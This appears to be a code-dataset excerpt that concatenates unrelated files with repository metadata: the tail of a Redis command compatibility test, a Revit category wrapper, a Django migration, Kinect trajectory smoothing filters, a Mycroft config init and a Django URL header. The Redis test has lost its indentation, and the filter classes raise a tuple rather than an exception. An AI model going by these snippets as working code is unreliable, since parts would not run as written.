# | SORT | X | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SORT', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 3 and resp[0] == '8')
# | SPOP | X | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SPOP', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == '10' or resp == '9' or resp == '8')
# | SRANDMEMBER | O | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SRANDMEMBER', key)
assert(resp == '10' or resp == '9' or resp == '8')
# | SREM | O | |
r('del', key)
r('sadd', key, 10, 9, 8)
resp = r('SREM', key, 10, 9)
assert(resp == 2)
# | SSCAN | O | Available since 1.4 |
r('del', key)
r('sadd', key, 10)
resp = r('SSCAN', key, 0)
assert(len(resp) == 2)
# | STRLEN | O | |
r('set', key, '01234')
resp = r('STRLEN', key)
assert(resp == 5)
# | SUBSCRIBE | X | |
resp = r('SUBSCRIBE', 'channel')
assert(resp.startswith('ERR Unsupported'))
# | SUBSTR | O | |
r('set', key, "This is a string")
resp = r('SUBSTR', key, 0, 3)
assert(resp == "This")
# | SUNION | X | |
r('del', key)
r('sadd', key, 'a', 'b', 'c')
resp = r('SUNION', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 3)
# | SUNIONSTORE | X | |
r('del', key)
r('del', key2)
r('sadd', key, 'a', 'b', 'c')
resp = r('SUNIONSTORE', key2, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 3)
# | SYNC | X | |
resp = r('SYNC')
assert(resp.startswith('ERR Unsupported'))
# | TIME | X | |
resp = r('TIME')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(len(resp) == 2)
# | TOUCH | O | Available since 1.4 (multi key) |
r('del', key)
r('del', key2)
resp = r('TOUCH', key, key2)
assert(resp == 0)
# | TTL | O | |
r('set', key, 100)
resp = r('TTL', key)
assert(resp == -1)
# | TYPE | O | |
r('set', key, 100)
resp = r('TYPE', key)
assert(resp == 'string')
# | UNSUBSCRIBE | X | |
resp = r('UNSUBSCRIBE')
assert(resp.startswith('ERR Unsupported'))
# | UNWATCH | X | |
# | WATCH | X | |
resp = r('WATCH', key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
resp = r('UNWATCH')
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 'OK')
# | WAIT | X | |
resp = r('WAIT', 1, 10000)
assert(resp.startswith('ERR Unsupported'))
# | ZADD | O | |
# | ZCARD | O | |
# | ZCOUNT | O | |
# | ZINCRBY | O | |
# | ZINTERSTORE | X | |
# | ZLEXCOUNT | O | Available since 1.4 |
# | ZRANGE | O | |
# | ZRANGEBYLEX | O | Available since 1.4 |
# | ZRANGEBYSCORE | O | |
# | ZRANK | O | |
# | ZREM | O | |
# | ZREMRANGEBYLEX | O | Available since 1.4 |
# | ZREMRANGEBYRANK | O | |
# | ZREMRANGEBYSCORE | O | |
# | ZREVRANGE | O | |
# | ZREVRANGEBYLEX | O | Available since 1.4 |
# | ZREVRANGEBYSCORE | O | |
# | ZREVRANK | O | |
# | ZSCAN | O | Available since 1.4 |
# | ZSCORE | O | |
# | ZUNIONSTORE | X | |
r('del', key)
resp = r('ZADD', key, 1.0, 'v1')
assert(resp == 1)
resp = r('ZCARD', key)
assert(resp == 1)
resp = r('ZCOUNT', key, 0.9, 1.1)
assert(resp == 1)
resp = r('ZINCRBY', key, 1.0, 'v1')
assert(float(resp) == 2.0)
resp = r('ZINTERSTORE', dest, 1, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 1)
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZLEXCOUNT', key, '-', '+')
assert(resp == 7)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZRANGE', key, 0, -1)
assert(len(resp) == 3)
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZRANGEBYLEX', key, '-', '[c')
assert(len(resp) == 3)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZRANGEBYSCORE', key, 1, 2)
assert(len(resp) == 2)
resp = r('ZRANK', key, "one")
assert(resp == 1)
resp = r('ZREM', key, "two")
assert(resp == 1)
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZREMRANGEBYLEX', key, '[a', '[e')
assert(resp == 5)
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZREMRANGEBYRANK', key, 0, 1)
assert(resp == 2)
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZREMRANGEBYSCORE', key, 0, 3)
assert(resp == 4)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZREVRANGE', key, 0, -1)
assert(len(resp) == 3 and resp[0] == 'two')
r('del', key)
r('zadd',key, 0, 'a', 0, 'b', 0, 'c', 0, 'd', 0, 'e', 0, 'f', 0, 'g')
resp = r('ZREVRANGEBYLEX', key, '[c', '-')
assert(len(resp) == 3)
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZREVRANGEBYSCORE', key, '(3', '(0')
assert(len(resp) == 2)
r('del', key)
r('zadd', key, 0, "zero", 1, "one", 2, "two")
resp = r('ZREVRANK', key, "zero")
assert(resp == 2)
r('del', key)
r('zadd', key, 0, "zero")
resp = r('ZSCAN', key, 0)
assert(len(resp) == 2 and resp[0] == '0')
r('del', key)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZSCORE', key, 'c')
assert(float(resp) == 2)
r('del', key)
r('del', key2)
r('zadd',key, 0, 'a', 1, 'b', 2, 'c', 3, 'd', 4, 'e', 5, 'f', 6, 'g')
resp = r('ZUNIONSTORE', key2, 1, key)
if GW:
assert(resp.startswith('ERR Unsupported'))
else:
assert(resp == 7)
finally:
r('del', key)
r('del', key2)
r('del', dest)
| 30.58125
| 169
| 0.397984
|
091e78817c792a7d74c2410030bd27fd1ebc944e
| 2,703
|
py
|
Python
|
rpw/db/category.py
|
gtalarico/revitpythonwrapper
|
50d96adf31f164ec8eb2f04e4bbc13f7a1c64d42
|
[
"MIT"
] | 105
|
2016-11-16T02:29:49.000Z
|
2021-11-29T15:07:05.000Z
|
rpw/db/category.py
|
gtalarico/revitpythonwrapper
|
50d96adf31f164ec8eb2f04e4bbc13f7a1c64d42
|
[
"MIT"
] | 43
|
2016-12-02T15:18:21.000Z
|
2020-10-20T01:03:36.000Z
|
rpw/db/category.py
|
gtalarico/revitpythonwrapper
|
50d96adf31f164ec8eb2f04e4bbc13f7a1c64d42
|
[
"MIT"
] | 41
|
2016-12-16T22:11:23.000Z
|
2022-02-03T17:43:24.000Z
|
"""
Category Wrapper
""" #
import rpw
from rpw import revit, DB
from rpw.db.element import Element
from rpw.base import BaseObjectWrapper
from rpw.utils.logger import logger, deprecate_warning
from rpw.db.builtins import BicEnum
class Category(BaseObjectWrapper):
"""
`DB.Category` Wrapper
Attribute:
_revit_object (DB.Family): Wrapped ``DB.Category``
"""
_revit_object_class = DB.Category
@property
def name(self):
""" Returns name of the Category """
return self._revit_object.Name
def get_families(self, wrapped=True, doc=None):
"""
Returns:
Families (``DB.Family``): List of Family elements in this
same category
"""
# There has to be a better way, but perhaps not: https://goo.gl/MqdzWg
unique_family_ids = set()
for symbol in self.get_symbols(wrapped=True):
unique_family_ids.add(symbol.family.Id)
doc = doc or revit.doc
elements = [doc.GetElement(family_id) for family_id in unique_family_ids]
return [Element(e) for e in elements] if wrapped else elements
@property
def families(self):
deprecate_warning('Category.families',
'Category.get_families(wrapped=True')
return self.get_families(wrapped=True)
def get_symbols(self, wrapped=True):
"""
Returns:
Symbols (``DB.FamilySymbol``): List of Symbol Types in the Category
"""
collector = rpw.db.Collector(of_category=self.builtin, is_type=True)
return collector.get_elements(wrapped)
@property
def symbols(self):
deprecate_warning('Category.symbols',
'Category.get_symbols(wrapped=True')
return self.get_symbols(wrapped=True)
def get_instances(self, wrapped=True):
"""
Returns:
(``DB.FamilyInstance``): List of Symbol Instances in the Category.
"""
collector = rpw.db.Collector(of_category=self.builtin, is_not_type=True)
return collector.get_elements(wrapped)
@property
def instances(self):
deprecate_warning('Category.instances',
'Category.get_instances(wrapped=True')
return self.get_instances(wrapped=True)
@property
def builtin(self):
""" Returns BuiltInCategory of the Category """
return BicEnum.from_category_id(self._revit_object.Id)
@property
def _builtin_enum(self):
deprecate_warning('Category._builtin_enum()', 'Category.builtin')
return self.builtin
def __repr__(self):
return super(Category, self).__repr__({'name': self.name})
| 30.033333
| 81
| 0.63744
|
a1b96bf28dc4b9a560b80d6ef5bc012b7c533e11
| 1,737
|
py
|
Python
|
examWeb/examWeb/web/migrations/0001_initial.py
|
bvoytash/Software-University
|
f2c6940cde093cea7b1c38bd88305206564c9947
|
[
"MIT"
] | null | null | null |
examWeb/examWeb/web/migrations/0001_initial.py
|
bvoytash/Software-University
|
f2c6940cde093cea7b1c38bd88305206564c9947
|
[
"MIT"
] | null | null | null |
examWeb/examWeb/web/migrations/0001_initial.py
|
bvoytash/Software-University
|
f2c6940cde093cea7b1c38bd88305206564c9947
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.2 on 2022-02-27 08:23
import django.core.validators
from django.db import migrations, models
import examWeb.web.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Album',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('album_name', models.CharField(max_length=30, unique=True)),
('artist', models.CharField(max_length=30)),
('genre', models.CharField(choices=[('Pop Music', 'Pop Music'), ('Jazz Music', 'Jazz Music'), ('R&B Music', 'R&B Music'), ('Rock Music', 'Rock Music'), ('Country Music', 'Country Music'), ('Dance Music', 'Dance Music'), ('Hip Hop Music', 'Hip Hop Music'), ('Other', 'Other')], max_length=30)),
('description', models.TextField(blank=True, null=True)),
('image_url', models.URLField()),
('price', models.FloatField(validators=[django.core.validators.MinValueValidator(0.0)])),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=15, validators=[django.core.validators.MinLengthValidator(2), examWeb.web.models.validate_username])),
('email', models.EmailField(max_length=254)),
('age', models.IntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(0)])),
],
),
]
| 45.710526
| 309
| 0.603339
|
f19e8f19348a304e5c3f814124379ecd99564202
| 18,575
|
py
|
Python
|
kinect_smoothing/trajectory_smoothing.py
|
ostadabbas/HW-HuP
|
0a7b4263f72e7ff7f9bc4c81366569822c3ee248
|
[
"MIT"
] | 47
|
2019-07-11T23:37:27.000Z
|
2022-03-07T09:52:24.000Z
|
kinect_smoothing/trajectory_smoothing.py
|
ostadabbas/HW-HuP
|
0a7b4263f72e7ff7f9bc4c81366569822c3ee248
|
[
"MIT"
] | 6
|
2019-09-23T15:57:38.000Z
|
2022-03-30T08:17:40.000Z
|
kinect_smoothing/trajectory_smoothing.py
|
ostadabbas/HW-HuP
|
0a7b4263f72e7ff7f9bc4c81366569822c3ee248
|
[
"MIT"
] | 9
|
2019-07-11T23:37:36.000Z
|
2022-02-02T00:22:55.000Z
|
import numpy as np
from functools import partial
from scipy import interpolate, signal
import pykalman
class Crop_Filter(object):
"""
The x, y coordinates of the trajectory were captured by some keypoint detection algorithms (e.g. Openpose).
Sometimes objects will be placed in the background and the depth coordinates may register as invalid values.
The Crop-Filter crops the invalid values and runs some interpolation methods to replace them.
"""
def __init__(self,flag='pchip',min_valid_value=100,max_valid_value=1300):
"""
:param flag: string, specifies the method for crop filtering on the data,
such as "zero","linear","slinear","quadratic","cubic","previous","next","nearest".
'pchip': PCHIP 1-d monotonic cubic interpolation, refer to 'Monotone Piecewise Cubic Interpolation'
'akima': Akima 1D Interpolator, refer to 'A new method of interpolation and smooth curve fitting based on local procedures'
:param min_valid_value: float, crop-filter the value < min_valid_value
:param max_valid_value: float, crop-filter the value > max_valid_value
"""
self.flag=flag
self.min_value = min_valid_value
self.max_value = max_valid_value
if flag in ["zero","linear","slinear","quadratic","cubic","previous","next","nearest"]:
self.filter = partial(interpolate.interp1d,kind=flag)
elif flag=='pchip' or flag=='PchipInterpolator':
self.filter = interpolate.PchipInterpolator
elif flag=='akima' or flag=='Akima1DInterpolator':
self.filter = interpolate.Akima1DInterpolator
if flag not in self.all_flags:
raise('invalid flags. Only support:', self.all_flags)
def smooth_trajectory_1d(self,trajectory_1d):
"""
smooth the 1-d trajectory or time-series data
:param trajectory_1d: numpy array, shape of (time_step,)
:return: numpy-array, smoothed trajectory, same shape as input trajectory_1d
"""
valid_ind_s = np.where(trajectory_1d >= self.min_value)[0]
valid_ind_l = np.where(trajectory_1d <= self.max_value)[0]
valid_ind = np.intersect1d(valid_ind_s,valid_ind_l,return_indices=False)
if len(valid_ind)==len(trajectory_1d):
return trajectory_1d
t = np.arange(len(trajectory_1d))
interp_fn = self.filter(valid_ind,trajectory_1d[valid_ind])
left_ind,right_ind = valid_ind[0],valid_ind[-1]
smoothed_ind = t[left_ind:right_ind+1]
smoothed_1d = interp_fn(smoothed_ind) # only interpolate middle are,
if left_ind>0:
left_val = trajectory_1d[left_ind]*np.ones(left_ind)
smoothed_1d = np.concatenate([left_val,smoothed_1d])
if right_ind<len(trajectory_1d)-1:
right_val = trajectory_1d[right_ind]*np.ones(len(trajectory_1d)-1-right_ind)
smoothed_1d = np.concatenate([smoothed_1d,right_val])
return smoothed_1d
def smooth_trajectory(self,trajectory):
"""
smooth the trajectory time-series data
:param trajectory: numpy array, shape of (time_step,coordinate_dim)
:return: numpy-array, smoothed trajectory, same shape as input trajectory
"""
trajectory=np.array(trajectory)
if len(trajectory.shape)<2:
trajectory=np.expand_dims(trajectory, axis=1)
time_step, dim = trajectory.shape[:2]
smoothed = trajectory.copy()
for ii in range(dim):
smoothed[:,ii] = self.smooth_trajectory_1d(trajectory[:,ii])
return smoothed
def smooth_multi_trajectories(self,trajectories):
"""
smooth the multi-joint trajectories
:param trajectories: numpy array, shape of (time_step,joint_num, coordinate_dim)
:return: numpy-array, smoothed trajectories, same shape as input trajectories
"""
trajectories=np.array(trajectories)
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
joint_num = trajectories.shape[1]
multi_joint_smoothed = trajectories.copy()
for ii in range(joint_num):
multi_joint_smoothed[:,ii] = self.smooth_trajectory(trajectories[:,ii])
return multi_joint_smoothed
@property
def all_flags(self):
flags=[
"zero",
"linear",
"slinear",
"quadratic",
"cubic",
"previous",
"next",
"nearest",
'pchip',#PchipInterpolator
'PchipInterpolator',
'akima',#Akima1DInterpolator
]
return flags
class GradientCrop_Filter(object):
"""
The x, y coordinates of the trajectory were captured by some keypoint detection algorithms (e.g. Openpose).
Sometimes objects will be placed in the background and the depth coordinates may register as invalid values.
The GradientCrop_Filter crops the large gradient values maybe miss-classsified as background
"""
def __init__(self,flag='pchip',max_valid_gradient=50):
"""
:param flag: string, specifies the method for crop filtering on the data,
such as "zero","linear","slinear","quadratic","cubic","previous","next","nearest".
'pchip': PCHIP 1-d monotonic cubic interpolation, refer to 'Monotone Piecewise Cubic Interpolation'
'akima': Akima 1D Interpolator, refer to 'A new method of interpolation and smooth curve fitting based on local procedures'
:param max_valid_gradient: float, crop-filter the gradient > max_valid_gradient
"""
self.flag=flag
self.max_valid_gradient = max_valid_gradient
if flag in ["zero","linear","slinear","quadratic","cubic","previous","next","nearest"]:
self.filter = partial(interpolate.interp1d,kind=flag)
elif flag=='pchip' or flag=='PchipInterpolator':
self.filter = interpolate.PchipInterpolator
elif flag=='akima' or flag=='Akima1DInterpolator':
self.filter = interpolate.Akima1DInterpolator
if flag not in self.all_flags:
raise('invalid flags. Only support:', self.all_flags)
def smooth_trajectory_1d(self,trajectory_1d):
"""
smooth the 1-d trajectory or time-series data
:param trajectory_1d: numpy array, shape of (time_step,)
:return: numpy-array, smoothed trajectory, same shape as input trajectory_1d
"""
valid_ind = []
valid_value = trajectory_1d[0]
for ii, val in enumerate(trajectory_1d):
if abs(valid_value - val) < self.max_valid_gradient :
valid_value = val
valid_ind.append(ii)
elif ii ==len(trajectory_1d)-1:
valid_ind.append(ii)
if len(valid_ind)==len(trajectory_1d):
return trajectory_1d
t = np.arange(len(trajectory_1d))
interp_fn = self.filter(valid_ind,trajectory_1d[valid_ind])
left_ind,right_ind = valid_ind[0],valid_ind[-1]
smoothed_ind = t[left_ind:right_ind+1]
smoothed_1d = interp_fn(smoothed_ind) # only interpolate middle are,
if left_ind>0:
left_val = trajectory_1d[left_ind]*np.ones(left_ind)
smoothed_1d = np.concatenate([left_val,smoothed_1d])
if right_ind<len(trajectory_1d)-1:
right_val = trajectory_1d[right_ind]*np.ones(len(trajectory_1d)-1-right_ind)
smoothed_1d = np.concatenate([smoothed_1d,right_val])
return smoothed_1d
def smooth_trajectory(self,trajectory):
"""
smooth the trajectory time-series data
:param trajectory: numpy array, shape of (time_step,coordinate_dim)
:return: numpy-array, smoothed trajectory, same shape as input trajectory
"""
trajectory=np.array(trajectory)
if len(trajectory.shape)<2:
trajectory=np.expand_dims(trajectory, axis=1)
time_step, dim = trajectory.shape[:2]
smoothed = trajectory.copy()
for ii in range(dim):
smoothed[:,ii] = self.smooth_trajectory_1d(trajectory[:,ii])
return smoothed
def smooth_multi_trajectories(self,trajectories):
"""
smooth the multi-joint trajectories
:param trajectories: numpy array, shape of (time_step,joint_num, coordinate_dim)
:return: numpy-array, smoothed trajectories, same shape as input trajectories
"""
trajectories=np.array(trajectories)
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
joint_num = trajectories.shape[1]
multi_joint_smoothed = trajectories.copy()
for ii in range(joint_num):
multi_joint_smoothed[:,ii] = self.smooth_trajectory(trajectories[:,ii])
return multi_joint_smoothed
@property
def all_flags(self):
flags=[
"zero",
"linear",
"slinear",
"quadratic",
"cubic",
"previous",
"next",
"nearest",
'pchip',#PchipInterpolator
'PchipInterpolator',
'akima',#Akima1DInterpolator
]
return flags
class Smooth_Filter(object):
"""
Smooth the trajectory data
"""
def __init__(self,flag='kalman',kernel_size=3, decay_rate=0.6):
"""
:param flag: string, specifies the method for smooth filtering,
'kalman': kalman filter
'wiener': weiner filter
'median': median filter
'moving_average' or 'ma': moving average filter
'weighted_moving_average' or 'wma': weighted moving average filter
'exponential_moving_average' or 'ema': exponential moving average
:param kernel_size: int, kernel size for median filter or wiener filter or moving average filter
:param decay_rate: float, decay rate for exponential moving average or weighted moving average filter
"""
self.flag = flag
self.kernel_size = kernel_size
self.decay_rate = decay_rate
if self.flag=='median':
self.filter = partial(self._median_filter,kernel_size=kernel_size)
elif self.flag=='wiener':
self.filter = partial(self._wiener_filter, kernel_size=kernel_size)
elif self.flag=='kalman':
self.filter = self._kalman_filter
elif self.flag=='moving_average' or self.flag=='ma':
self.filter = partial(self._ma_filter, kernel_size=kernel_size)
elif self.flag=='exponential_moving_average' or self.flag=='ema':
self.filter = partial(self._ema_filter, decay_rate=decay_rate)
elif self.flag=='weighted_moving_average' or self.flag=='wma':
self.filter = partial(self._wma_filter, decay_rate=decay_rate)
if flag not in self.all_flags:
raise('invalid flags. Only support:', self.all_flags)
def _median_filter(self, trajectory,kernel_size):
"""
smooth the time series data with median filter
:param trajectory: numpy-array
:param kernel_size: int, the size of the median filter window
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
filt_traj[:,ii] = signal.medfilt(trajectory[:,ii], kernel_size=kernel_size)
filt_traj[:, 0] = filt_traj[:, 1]
filt_traj[:, -1] = filt_traj[:, -2]
return filt_traj
def _wiener_filter(self,trajectory,kernel_size):
"""
smooth the time series data with Wiener filter
:param trajectory: numpy-array
:param kernel_size: int, the size of the Wiener filter window
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
filt_traj[:,ii] = signal.wiener(trajectory[:,ii], mysize=kernel_size)
filt_traj[:, 0] = filt_traj[:, 1]
filt_traj[:, -1] = filt_traj[:, -2]
return filt_traj
def _kalman_filter(self,trajectory):
"""
smooth the time series data with Kalman filter
:param trajectory: numpy-array
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
self.kf = pykalman.KalmanFilter(n_dim_obs=dim, n_dim_state=dim,initial_state_mean=trajectory[0])
state_mean, state_covariance = self.kf.filter(trajectory)
filt_traj = state_mean
return filt_traj
def _ma_filter(self,trajectory,kernel_size):
"""
smooth the time series data with moving average
:param trajectory: numpy-array
:param kernel_size: int, the size of the moving average filter window
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
r = np.arange(1, kernel_size - 1, 2)
for ii in range(dim):
a = trajectory[:,ii]
out0 = np.convolve(a, np.ones(kernel_size, dtype=int), 'valid') / kernel_size
start = np.cumsum(a[:kernel_size - 1])[::2] / r
stop = (np.cumsum(a[:-kernel_size:-1])[::2] / r)[::-1]
filt_traj[:,ii] = np.concatenate((start, out0, stop))
return filt_traj
def _ema_filter(self,trajectory,decay_rate):
"""
smooth the time series data with exponential moving average
:param trajectory: numpy-array
:param decay_rate: float, decay rate for exponential moving average
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
a = trajectory[:,ii]
smoothed = [a[0]]
for val in a[1:]:
new_val = decay_rate * val + (1 - decay_rate) * smoothed[-1]
smoothed.append(new_val)
filt_traj[:, ii] = np.array(smoothed)
return filt_traj
def _wma_filter(self,trajectory,decay_rate):
"""
smooth the time series data with weighted moving average
:param trajectory: numpy-array
:param decay_rate: float, decay rate for weighted moving average
:return: numpy-array, smoothed time-series data
"""
time_step, dim = trajectory.shape[:2]
filt_traj =trajectory.copy()
for ii in range(dim):
a = trajectory[:,ii]
smoothed = [a[0]]
for jj in range(1,len(a)):
new_val = decay_rate * a[jj] + (1 - decay_rate) * a[jj-1]
smoothed.append(new_val)
filt_traj[:, ii] = np.array(smoothed)
return filt_traj
def smooth_trajectory(self,trajectory):
"""
smooth the time series data
:param trajectory: numpy array, shape of (time_step,coordinate_dim)
:return: numpy-array, smoothed time series data, same shape as input series
"""
trajectory=np.array(trajectory)
if len(trajectory.shape)<2:
trajectory=trajectory.reshape(trajectory.shape[0],1)
smoothed=self.filter(trajectory)
return smoothed
def smooth_multi_trajectories(self,trajectories):
"""
smooth the multi-joint-trajectories data
:param trajectories: numpy array, shape of (time_step,joint_num, coordinate_dim)
:return: numpy-array, smoothed trajectories, same shape as input trajectories
"""
trajectories=np.array(trajectories)
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
joint_num = trajectories.shape[1]
multi_joint_smoothed = trajectories.copy()
for ii in range(joint_num):
multi_joint_smoothed[:,ii] = self.smooth_trajectory(trajectories[:,ii])
return multi_joint_smoothed
@property
def all_flags(self):
flags=[
"median",
"wiener",
"kalman",
"moving_average",
"ma",
"exponential_moving_average",
"ema",
"weighted_moving_average",
"wma",
]
return flags
class Motion_Sampler(object):
"""
For up-sampling or under-sampling in time-series data
"""
def __init__(self,motion_threshold=15,min_time_step=30,
interpolator='pchip',interpolate_ratio=[3,2,1],interpolate_threshold=[50,100]):
"""
:param motion_threshold: float, threshold for motion-detection.
If x(t) - x(t-1) < motion_threshold, the object considered to be without moving from 't-1' to 't'
:param min_time_step: int, minimum remaining time-step after motion-detect under sampling.
:param interpolator: string, method for interplation for up-sampling the trajectory data,
such as "zero","linear","slinear","quadratic","cubic","previous","next","nearest".
'pchip': PCHIP 1-d monotonic cubic interpolation, 'Monotone Piecewise Cubic Interpolation'
'akima': Akima 1D Interpolator, 'A new method of interpolation and smooth curve fitting based on local procedures'
:param interpolate_ratio: list of int, interpolation ratio for up-sampling
:param interpolate_threshold: list of int, interpolation threshold for up-samling
e.g. if len(data)<interpolate_threshold[0], then ratio = interpolate_ratio[0]
"""
self.motion_threshold=motion_threshold
self.min_time_step = min_time_step
self.interpolate_ratio = interpolate_ratio
self.interpolate_threshold = interpolate_threshold
if interpolator in ["zero","linear","slinear","quadratic","cubic","previous","next","nearest"]:
self.interpolator = partial(interpolate.interp1d,kind=interpolator)
elif interpolator=='pchip' or interpolator=='PchipInterpolator':
self.interpolator = interpolate.PchipInterpolator
elif interpolator=='akima' or interpolator=='Akima1DInterpolator':
self.interpolator = interpolate.Akima1DInterpolator
def motion_detection(self,trajectory,thresh=None):
"""
Remove the non-moving part of the trajectory. (Just keep the significant movements)
:param trajectory: numpy-array, shape of (time_step, *, coordinate_dim)
:param thresh: float, threshold for motion-detection.
:return: numpy-array. the new trajectory that filtered out the no-moving-part, have the same shape of the input trajectory
"""
if thresh is None:
thresh = self.motion_threshold
motion_data = [trajectory[0]]
left_valid_ind = int(2*len(trajectory)/5)
right_valid_ind = int(3*len(trajectory)/5)
for ii in range(1, len(trajectory)):
diff = np.sum(np.abs(trajectory[ii] - motion_data[-1]))
if diff >= thresh or (ii>=left_valid_ind and ii<=right_valid_ind):
motion_data.append(trajectory[ii])
if len(motion_data) < self.min_time_step and thresh<=0:
motion_data = self.motion_detection(trajectory, thresh // 2)
motion_data = np.array(motion_data)
return motion_data
def interpolate_trajectory(self,trajectory):
"""
interpolate and upsample the trajectory
:param trajectory: numpy-array, shape of (time_step, coordinate_dim)
:return: interpolated trajectory, which has a shape of (interpolate_ratio*time_step, coordinate_dim)
"""
if len(trajectory.shape)<2:
trajectory=np.expand_dims(trajectory, axis=1)
L,feat_dim =trajectory.shape[:2]
t=np.arange(L)
ratio = self.interpolate_ratio[0]
for rat, thr in zip (self.interpolate_ratio[1:],self.interpolate_threshold):
if L>thr:
ratio=rat
if ratio<=1:
return trajectory
new_t = [ii/ratio for ii in list(range(ratio*(L-1)+1))]
interp_data=np.zeros((len(new_t),feat_dim))
for jj in range(feat_dim):
f = self.interpolator(t, trajectory[:,jj])
new_traj = f(new_t)
interp_data[:,jj] = new_traj
return interp_data
def interpolate_multi_trajectories(self,trajectories):
"""
interpolate and upsample the multi-joint-trajectory
:param trajectory: numpy-array, shape of (time_step, joint_num, coordinate_dim)
:return: interpolated trajectory, which has a shape of (interpolate_ratio*time_step, joint_num, coordinate_dim)
"""
if len(trajectories.shape)<3:
trajectories=np.expand_dims(trajectories, axis=1)
L,joint_num, feat_dim = trajectories.shape[:3]
ratio = self.interpolate_ratio[0]
for rat, thr in zip(self.interpolate_ratio[1:],self.interpolate_threshold):
if L>thr:
ratio=rat
new_t = [ii/ratio for ii in list(range(ratio*(L-1)+1))]
multi_interpolated=np.zeros((len(new_t),joint_num,feat_dim))
for ii in range(joint_num):
multi_interpolated[:, ii] = self.interpolate_trajectory(trajectories[:, ii])
return multi_interpolated
| 37.830957
| 127
| 0.736312
|
9f741660eadb5cd7f49051b2bee259c9ef819d29
| 790
|
py
|
Python
|
mycroft/configuration/__init__.py
|
HelloChatterbox/mycroft-core
|
c417807d32eff629354ffe740da14caed2a1bee5
|
[
"Apache-2.0"
] | 1
|
2021-05-04T20:59:48.000Z
|
2021-05-04T20:59:48.000Z
|
mycroft/configuration/__init__.py
|
HelloChatterbox/mycroft-core
|
c417807d32eff629354ffe740da14caed2a1bee5
|
[
"Apache-2.0"
] | 5
|
2021-04-13T22:54:47.000Z
|
2021-04-18T14:24:25.000Z
|
mycroft/configuration/__init__.py
|
HelloChatterbox/mycroft-lib
|
c417807d32eff629354ffe740da14caed2a1bee5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from mycroft.configuration.config import Configuration, LocalConf, RemoteConf
from mycroft.configuration.locale import set_default_lf_lang
from mycroft.configuration.locations import SYSTEM_CONFIG, USER_CONFIG
| 43.888889
| 77
| 0.793671
|
79e2c2febdf8734ae42c6ade81300b4e0b87eb1c
| 797
|
py
|
Python
|
compileio/urls.py
|
unownone/Online_Compiler
|
b10f147f25210c4daad987a8cee30f5185e2d332
|
[
"MIT"
] | 2
|
2021-07-23T14:01:14.000Z
|
2021-07-23T14:47:08.000Z
|
compileio/urls.py
|
unownone/Online_Compiler
|
b10f147f25210c4daad987a8cee30f5185e2d332
|
[
"MIT"
] | null | null | null |
compileio/urls.py
|
unownone/Online_Compiler
|
b10f147f25210c4daad987a8cee30f5185e2d332
|
[
"MIT"
] | 1
|
2021-11-01T06:12:44.000Z
|
2021-11-01T06:12:44.000Z
|
"""compileio URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
